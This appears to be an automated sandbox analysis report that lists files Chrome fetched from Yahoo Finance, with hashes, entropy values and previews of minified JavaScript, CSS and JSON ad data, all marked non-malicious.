                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:DFA7B52C86E56BD67FA4002F6ED19854
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:7DF722645482433C2B5C8D8AB4272A9874592F27
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:F68019EB4B4E5933301D4EE75969E0CB94ED8333BF514630FA749EB9C3E483C9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:562D75C4540B7EBFE43FF28A4134C813E7E1BD1562F1E722FA62193E1315D4D2800150E0E3680F09BEDF004B96D6B22BF63AF8B32589CF469663BEDB4C59EE5D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:.PNG........IHDR..............|.l....IDAT.W=.1R.P.....J.'J.%....p...(.i@....p.1..E..|.x..cBL .3.. ...,((X...0J.{.....;..#.O.U....K..f..1...A=.K...s....n...`....w+.-k.. ..=..?./sYp...Vmn..f....f..yr..AT.g...,..;...@........}.S.......IEND.B`.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Java source, ASCII text, with very long lines (5212)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):5213
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.5056267606121185
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:96:iJ3Pse8L3WurIdZczOLh2BmHbXsO0Rcr76x9mc34I6MHI6dkvdxue:iJ3PV8QsI2ybXsO0aizX3PhHTdkqe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:FE865065F9732A89B55174BC6703F725
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:C18D1E3658C798D5D8EE41704324E2EB078D124D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:D07D5F7B1F856055EEAB5ADA899D2D299DC79ED12AAAA44255EEC5FDA2553A43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:A8692CEEAA68F292106AB1AD09D04C97F9B6BB7E17408E2D6F8C8F05265C691CC3884B28F58CB60CD0A00910F88C8EA83FB8AFEB7DCEBEEED445DD4C1FC15350
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/chunks/AdGroup.B9K-yuAc.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{s as Z,p as q,k as U,n as H,i as O,x,o as $,I as ee,y as ie,e as ne,d as se,f as te,q as c,O as V,L as C,K as G,F as ae,G as oe,v as de,Q as le}from"./scheduler.Dsuh-FKt.js";import{e as W}from"./each.CI2tb2RB.js";import{S as re,i as fe}from"./index.CvwOawEI.js";import{g as N,m as ue,s as ce}from"./commonUtil.BWwawKjd.js";import{c as K,s as E,i as he}from"./ads.DhuB_mth.js";import{i as _e}from"./intersectUtil.DVqOQxux.js";import{A as ge}from"./context.Bt1NApa8.js";function M(e,i,a){const s=e.slice();s[28]=i[a],s[31]=i,s[32]=a;const n=s[6]&&s[6][s[28]];s[29]=n;const l=s[4]&&s[29]&&"size"in s[29]&&E.getFirstFixedHeight(s[29].size);return s[30]=l,s}function Q(e){let i,a,s,n,l,o,_,b=e[32],y,m;const z=()=>e[11](i,b),I=()=>e[11](null,b);return{c(){i=ne("div"),this.h()},l(h){i=se(h,"DIV",{id:!0,class:!0,"data-testid":!0,"data-ad-unit":!0,"data-ad-size":!0,"data-ad-region":!0,"data-ad-loc":!0}),te(i).forEach(O),this.h()},h(){var h,d;c(i,"id",a=e[28]),c(i,"class",s=V(`sdaContainer ${e[2]}
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (2120)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):2121
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.056134830280061
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:48:si6FLthJByP7ymMhyutyLdfEayYybRCMmxZJl:sbtHEqIfEBRAZJl
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:CA943F9EB7034510B1E3437075B6DBC1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:BD6DD619CE7310973E66E5C8D5DE57894BAD0A64
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:4E5FFC5A8BDE5E45633A92A9C2FE4EB09558A2A30273B68386E0DAD0EBAF46F6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:157384D1D8C98C02278670751AFB665CDD848927935157773D649726304776A4A5751BDAB961143BAAD9C754D84F96041DE0730C978D68E681D6EF9E868CCEE0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/assets/EnhancedPill.Ds2SUVLv.css
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:dialog.yf-cex3h9.yf-cex3h9{--_dialog-transition:.5s;--_dialog-timing-function:cubic-bezier(.5, -.5, .1, 1.5);transition:opacity var(--_dialog-transition) var(--_dialog-timing-function);animation:yf-cex3h9-scale-down var(--_dialog-transition) var(--_dialog-timing-function) forwards}dialog[open].yf-cex3h9.yf-cex3h9{animation:yf-cex3h9-slide-in-up var(--_dialog-transition) var(--_dialog-timing-function) forwards}dialog.yf-cex3h9.yf-cex3h9,dialog.yf-cex3h9 .dialog-content.yf-cex3h9{border-radius:var(--border-radius-l)}dialog.yf-cex3h9.yf-cex3h9::backdrop{background-color:#000c}dialog.yf-cex3h9 .dialog-content.yf-cex3h9{display:flex;flex-direction:column;align-items:flex-start;justify-content:center;gap:var(--space-4);background-color:var(--surface2a)}dialog.yf-cex3h9 .dialog-content.yf-cex3h9 .close-button{position:absolute;top:4px;right:4px}dialog.yf-cex3h9 .dialog-content.padded.yf-cex3h9{padding:40px var(--size-space-6) var(--size-space-8) var(--size-space-6)}@media only screen and (wid
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (65099)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1424302
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.416374295019898
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:8nabJ5mwCtCj8vxpzrJTB92t28I/Uv2uI4UPxhsWmgDlAtnlDn45FgrFf5o9HU9D:JGwCCIvHvJ992tm2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:7085DEFD678FE29D77C3DA238C49D5B5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:560DE7B9275693D59DD22A114DB59A5CE2371689
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:3CFB29B4ACEAD27B36C1FFB846E26776C5FF0544BFDDC53BA9BF47A65FF32C18
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:0DAE012354A72F7146C413F3E6865A2D0638DCD02A53A667F8699244176B7881B748A0EE577EFFD10DB316BE11281E1965DCB2D0CC266654637816461B624294
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview://AB_TEMPLATE.//ab -> 26......var _taboola = _taboola || [];var TRC = TRC || {};.TRC.perfConfOverride = {'logTimer': 50000, 'logLength' : 5, 'traffic' : 50, 'measureEnable' : true, 'measureTimeToSend' : 10000, 'measureInterval' : 10000, 'disableRawDataSend': true};.......................................................................................................................................................................... ..(function(){var __webpack_modules__={6337:function(){!function(){"use strict";if("object"==typeof window)if("IntersectionObserver"in window&&"IntersectionObserverEntry"in window&&"intersectionRatio"in window.IntersectionObserverEntry.prototype)"isIntersecting"in window.IntersectionObserverEntry.prototype||Object.defineProperty(window.IntersectionObserverEntry.prototype,"isIntersecting",{get:function(){return this.intersectionRatio>0}});else{var e=function(e){for(var t=window.document,n=r(t);n;)n=r(t=n.ownerDocument);return t}(),t=[],n=null,i=null;a.prototy
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (15982)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):15983
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.276310747729203
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:384:OlBFsc1FscPFschEi+Q9zwXyE3fue8C8LJ+:Opr+QRlE/8U
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:76589F389BD1114C31FBA4F046283E7D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:97EB2C52BE92F67E09B70407A60A99FBC33587A6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:F4611C44096648CA1D0A46DB407B8A7ABDCFCBF4AE424097DA3DD825112AB025
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:B632E0BE942A6F8B8904E155A2CABC1EEFF01F4FF4A3239C7C31D3CD2C2B020CB2B756006E75E3FBADBA7C41FC963A0E0815D4CE825F611CD25E512C6463F7A4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{a as n,t as m,f as u,b as T,N as g}from"./commonUtil.BWwawKjd.js";import{p as R}from"./43.BgWy8GOF.js";import{l as N}from"./loadQuoteType.ol0a8pjs.js";import{e as A}from"./index.g5YcAAdQ.js";const H=/[a-zA-Z0-9^.$_+=*&:@~-]+/g,l={POST:"POST",PRE:"PRE",REGULAR:"REGULAR"},L=["__quoteLeaf","__companyInsights","__quoteleaf"],M=["/valute/convertitore","/divisas/conversor","/devises/convertisseur","/waehrungen/waehrungsrechner","/finanzas-personales/conversor-divisas"],F={CLOSED:l.POST,POST:l.POST,POSTPOST:l.POST,PRE:l.PRE,PREPRE:l.POST,REGULAR:l.REGULAR},G=new Set(["analyst-ratings","analysis","balance-sheet","cash-flow","community","components","history","financials","futures","holders","holdings","insider-roster","insider-transactions","key-statistics","latest-news","news","options","performance","press-releases","profile","purchase-info","risk","sec-filing","summary","sustainability","chart"]),B=["price","summaryDetail","pageViews","financialsTemplate"],K={MONEYMARKET:"pf-banking"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):141052
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.5655154158732705
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:1536:gcozYwYujK65gypzELhmaivxZpY6yOlKkPoIremaiMCHDYRYpjKrKozYmaic:GzYwYuj2GxZpY6yOlrPoIr5DYRYpjyq
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:0BD0345E217E5499F6115367DE7EA9B5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:F2E1632B3DBB4E21621D7A3B56ED2372CAF5EE8C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:A119899FDEE8A3B406A2AADA3E28B311A4574036BCF0EEFCD6D08C40A9E4347B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:AE5434ECAF7C6DF0A50851632C42782B2E09CEEED395B56F4712B607D0048DB27CEFF5F9DDA8EB8A77379CCAC855A54DDB0D9AF8AEFED882DABA02824ED8EA93
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:{"items":[{"data":{"partnerData":{"adMeta":{"hashtag":"garden","isSupplySegment":"false","lang":"en-US","region":"US","rs":"lmsid:a0a6T00000R0R0tQAF;revsp:the_spruce_188;lpstaid:8551ac12-1fc9-3d5d-ab15-8e6326882e08;pt:content;pd:modal;ver:megastrm;pct:story","site_attribute":"wiki_topics=\"Getty_Images;Sense_of_smell;Dotdash_Meredith;Spray_bottle;Eucalyptus_oil\" ctopid=\"1774000;1795000\" hashtag=\"1774000;1795000\" rs=\"lmsid:a0a6T00000R0R0tQAF;revsp:the_spruce_188;lpstaid:8551ac12-1fc9-3d5d-ab15-8e6326882e08;pt:content;pd:modal;ver:megastrm;lu:0;pct:story\"","spaceid":"1197792446","site":"lifestyle","enabled":true,"pos":"","showBodyAds":false,"showPhotoAds":false},"alias":"ymedia-alias:shadow=15-smells-mice-hate-keep-110000842","canonicalSite":"lifestyle","canonicalUrl":"https://www.thespruce.com/smells-that-mice-hate-8716926","categoryLabel":"Lifestyle","commentsAllowed":true,"commentsCount":0,"contentMeta":{"adPostions":{"photos":{},"INARTICLE":3},"bodySlots":{},"cover":null,"embe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):89
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.6758153040851855
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:h/SaNLBKpqYFCu1YSHKHg4Rcgf+F/FCD:TZBK/hYoKA4mg24D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:42F21DB36AD72C8C36A737B4C5A568D1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:391A315C736001175C1CEA254C588B932260D880
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:31A34028CF64A9C5415FD0E5E5920A4057FADD0B5974ADDA1D13EB45AAFFBFC6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:D697AEE856C373450D1762C91AACE13499E57BE53D649A91311AE87DE1494729531CC87A1970A12E70FF0533ACA91ED3BE5CCEB8A24DB5792B42288C8835B831
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:const o=typeof window<"u"?window:typeof globalThis<"u"?globalThis:global;export{o as g};.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (2634)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):2635
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.931874658917223
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:48:Dvr2i8XHshH2+ZcMPHegoxeLquZoQurLHzSS5E:0XHAH24cMFN
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:629B88956306EC96C3719982FA7A4C74
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:5C37C5472E73E7B185ED874E6C33B46FF9881281
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:C4A6160A4CBDDD7A6459A270B266A20848B7BB6612D1C84CF9D74457DF58CD19
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:B289AD24952DA85CA853DC48CB1810A4E626ED3DC57E0983B2EA93C44BCEBB0E0B0AFD47B42B25FE781C3626EDC45EF820915AD163F58C4615C7F5B508C92374
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/assets/EventCalendarPreview.CNE2v6iu.css
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:.upscaled-title-wrapper.yf-f3r76y .title.yf-f3r76y{display:none}.wrapper.yf-f3r76y.yf-f3r76y{display:flex;flex-direction:column;height:90%;padding:0 var(--space-3)}.empty-state.yf-f3r76y.yf-f3r76y{color:var(--text2);height:100%;display:flex;flex-direction:column;justify-content:center;align-items:center;margin:var(--space-5) 0}li.yf-f3r76y.yf-f3r76y{border-bottom:1px dashed var(--separator);padding-top:var(--space-1);padding-bottom:var(--space-1)}li.yf-f3r76y.yf-f3r76y:hover{background-color:var(--table-hover)}li.yf-f3r76y .actual.yf-f3r76y{display:none}li.past.yf-f3r76y .actual.yf-f3r76y{display:block}li.past.yf-f3r76y .pill.yf-f3r76y{font-size:var(--font-s);font-weight:var(--font-normal);background-color:var(--separator)}li.clickability.yf-f3r76y .pill.yf-f3r76y{background-color:transparent;padding-left:0;padding-right:0}li.yf-f3r76y.yf-f3r76y:last-child{border-bottom-width:0}li.yf-f3r76y .data-wrapper.yf-f3r76y{display:grid;grid-template-columns:repeat(3,1fr);white-space:nowrap;text
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:gzip compressed data, was "shell-bundle.js", last modified: Thu Jun 27 09:13:17 2024, from Unix, original size modulo 2^32 104981
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):27725
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.993745041801921
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:768:SbCXAmEey2eNLKfcTWcCGgw6Vx98arP16I:SbCXAdI01Fgw6V78arP1z
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:698B13CA94E76A5B58D2CCBA59E9496C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:3B5ADE89885DC4FD0631AECB2AB2D68119D48009
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:4DE87C291C878EE546FC315CCDC376D63A818D281231FAEB978CCB57BA7424B0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:F24DCCA8CA07DF7A14948FF885702A76B7C5A61FAD1DFD132DC2E77A473E1B38023A8692FFEF984E8206FDD55F21BB1E4BC45E9E28283762778CDF81766ABC7E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:....--}f..shell-bundle.js..;.R.J..b.R..;Ll.6..r.I.@..y.CQ.l.m......[.~..m ..{.VR.h.=...Y0.3....d.....#.O......K:/.X,.....|d.....d.....m.!aD8...nR.:......rH.....^.9.F.Wkt:.....f...iv.CV&.n.......-.-.....~o.R....w..),.6X..#7a..~4.....[.O..s.;.CB...(...e.....Z........6^GQ4.E..+.l..7..q.V.....M>bA...?.E.V6X...n..,a.J9.q..}a.....Gm.....k.sp.......ZRc.....E.......M..Qb;s..,.).n2L'(3..#.S.\.:..O.$J..f.a....x.......6.&r.l.0.&aiU#.rq|.{'...R.d.A..0.....ul.G.I.s.....X.,.9...".}7.lA.L...?.Dm.9Y.we..n..*Xj.m......a.@:.}{.....u ....6Nn...G~..YY....V......J2M..O.H..Y6.....?dcJz.l|"...+...7......l|%...G.w...#....h3.x.p....C|h6....w.4....m....8.m.. .......p ..p....X.Qh....a.(..... }z.wl`!.q..?R...x.>4U.#....6....76.T........s.{..........q@..R"..w.`RD........"7....b.KOc.. #....g...[.I....R.8.C^8h4..C.Vm.t...............]....,.vT.....{.~..wl......1..s=..i....I..b....+.7).Y....}g}AA..C`.bmV.Y...T....u(.0.U\a.......b..$.P....C..:.k..........r...V...L..../<....5.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):206
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.748805071873871
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:HZ8sqDmJS4RKb5ykKcvXjXRHoNcHXDFhCTL6lRcoFU6uSvHBXheF/cazTPH8KFAh:H69mc4sl3O4zDQL6Akd/Bg+fb
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:14EA00F1960955017A2D326CE7DD4901
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:9E6218631E95A6197E972A28CFF3F6CF12996DBE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:0D1B099D5A0C41A08AF16526735EA6A3C14FF505892302D1D5588A9FED26CEFB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:AE2CDC29D7B7E03D9245858B251BC1E8F13E0D38B4A664B45F36E1A82DF74D6624E9BDAA749D2C8F40D8E892E0F2EBBECEA9CA915D28C53D34FB87FCC2178D21
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:const s='<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M19 6.41 17.59 5 12 10.59 6.41 5 5 6.41 10.59 12 5 17.59 6.41 19 12 13.41 17.59 19 19 17.59 13.41 12z"/></svg>';export{s as C};.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (13914), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):13914
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.258346764050396
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:384:3x7q46AEQ42tWCnPfQefR7GDD6Ub45XBB8qQMmF88zzAqSeXHr4baLHDW4XbXZ34:B7q46P5gp7GD9b45s3kjeXr4UjW4XbXm
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:69831B2F7B26BC6DD6321C8DCDE85968
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:BE0D47A076698915D827447B210BFFAB24AF3BC7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:ED22526F9ADCDD172C698E0DFC9FA3EE064A96A27BED3335931C4B2BDDF4EEE9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:2804AEA752858CBE2020FE5977B1BD4F064026D758ACF19176498F70DB4026604DFFABC9350F61E1022AD405BD46C01080B4F65E579AF6BA1E2C326E356771B0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer-lightbox",[],t):"object"==typeof exports?exports["wafer-lightbox"]=t():(e.wafer=e.wafer||{},e.wafer.wafers=e.wafer.wafers||{},e.wafer.wafers["wafer-lightbox"]=t())}("undefined"!=typeof self?self:this,function(){return function(e){function t(n){if(o[n])return o[n].exports;var l=o[n]={i:n,l:!1,exports:{}};return e[n].call(l.exports,l,l.exports,t),l.l=!0,l.exports}var o={};return t.m=e,t.c=o,t.d=function(e,o,n){t.o(e,o)||Object.defineProperty(e,o,{configurable:!1,enumerable:!0,get:n})},t.n=function(e){var o=e&&e.__esModule?function(){return e.default}:function(){return e};return t.d(o,"a",o),o},t.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},t.p="https://s.yimg.com/aaq/wf/",t(t.s="./src/entry.js")}({"./src/entry.js":function(e,t,o){"use strict";function n(e,t,o){return t in e?Object.defineProperty(e,t,{value:o,enumerable:!0,configurabl
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (45591)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):45639
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.329565888307947
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:768:GDBrGM2jRx2khRbAu+D+Atg8r+AMQJd9hBuLWwIgyIlS+cPD4n2F5Q33RS0m3t:GDlGM2jRxfhaGAtFeQZb+yIluLJi3QHd
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:177D755DE6B69409ABFF86651782B3F9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:5D8E3582F9B694491C55C8200C8543E4868412F3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:9DB9A5A8D328C70B53272D4DFF11E298182278108DDA394DABAC4C79410EC279
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:4BFED05BCDC17C67ACDFAD78EF83B86DC9A86ABACEFD0A1453359D72735E5A932352E7C790F8B4C01E697295C34C77DC0B91569BAA41B648D96A65FD94711A19
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://static-cdn.spot.im/production/registration/tags/v1.46.0/registration-bundle.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:(()=>{"use strict";var e,t,n,r,o={3880:(e,t,n)=>{n.r(t),n.d(t,{USER_SEGMENT:()=>ft,addPluralRules:()=>_t,attachListener:()=>ct,buildAdminDashboardUrl:()=>Be,checkBrowser:()=>oe,conversationPageBackToCommentsEnabled:()=>We,copyToClipboard:()=>Oe,createEventListenerGroup:()=>ut,dispatchCustomEvent:()=>ge,dispatchEvent:()=>se,dispatchInternalEvent:()=>Xe,dispatchSpotimEvent:()=>me,formatLanguageCode:()=>ee,formatLokaliseLanguageCode:()=>te,formatToLocaleString:()=>$,getActiveElement:()=>wt,getAsyncCallConfigs:()=>Ze,getCloudinaryUrl:()=>Ce,getCurrentScrollPosition:()=>Y,getCustomPublisherData:()=>Ee,getDebugger:()=>ze,getDynamicTranslations:()=>Qe,getLocation:()=>be,getPostId:()=>nt,getSegment:()=>gt,guid:()=>X,initScrollListener:()=>q,isHTMLElement:()=>yt,isIOS:()=>bt,isInIframe:()=>ce,isInSafeframe:()=>U,isMobileDevice:()=>et,isOldBrowser:()=>ue,isUnsupportedBrowser:()=>ie,isWebpSupported:()=>Le,isWebpSupportedAsync:()=>ke,listenOnce:()=>st,loadJSFile:()=>lt,navigate:()=>Pe,navigateSafe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (6645), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):6645
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.153971139811532
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:192:3e4uADK8v5xzWosWjYugPwNC96vTrWJcXux8jVD:3qA+8nWofjYFPwo6vTrq0uep
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:2E3968239B770B8186BB480D513311CD
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:E2583E321454F9F48193918E3316533226ED62FA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:D77E659299C397037513AFF88093B64F6CE29994B94D99256AD84A7910C0CEB3
